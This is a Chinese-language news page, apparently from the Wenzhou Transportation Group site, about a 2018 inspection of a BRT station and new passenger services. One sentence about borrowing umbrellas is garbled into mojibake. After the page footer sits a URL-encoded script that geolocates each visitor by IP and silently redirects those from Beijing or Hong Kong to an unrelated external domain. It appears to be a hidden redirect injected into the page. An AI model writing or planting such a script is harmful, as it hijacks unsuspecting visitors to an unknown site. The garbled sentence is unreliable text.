当前位置: 您当前的位置 : 温州交运集团 > 交运资讯 > 集团要闻 >正文
集团领导调研基层促发展
来源: 发布时间:2018年12月12日 09:56:05 作者: 字体:

  12月6日下午,集团党委书记、董事长、总经理李长江到快速公交火车站BRT站台,视察万人双评议工作。李长江在站台内一边听介绍,一边查看、询问细节,并对提升改进的细节提出建议。

  在听取相关汇报后,他肯定了快速公交对万人双评议工作的重视,要求在下阶段的工作和活动中强化细节,以点带面,深入提升服务,将好的措施做法建立长效机制,抓常抓长,争取获评万人双评议最满意单位。火车温州站BRT站台作为万人双评议参评窗口,在前阶段工作中被选为市国资系统内满意单位。站内设有学雷锋服务站,推出多项便民服务措施,深受市民好评。

  此外,快速公交推出“文明交通全民共创·快速公交与您同行”主题系列服务。继诚信零币箱、城市书巢“诚信置换”后,BRT站台还推出了“诚信雨伞”服务,方便市民雨天出行。该服务优选了火车温州站、东明路口上下行、环城东路下行等客流量较大的站台试点。市民在BRT站台可免费取走雨。栌霉挠晟】稍谌我釨RT站台进行归还,全凭自觉。此外,快速公交还组织开展了“温州快速公交志愿扶老活动周”活动,在东明路口、环城东路、解放街路口等BRT站台发动志愿者服务乘客,尤其是老年乘客。志愿者们积极引导市民排队候车,监督公交车辆规范进站,遇见行动不便的老人或携带行李的乘客,主动上前帮忙。

交运资讯

WENZHOU TRANSPORTATION

交运电子报

GROUP BRIEFING

交运电子报

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E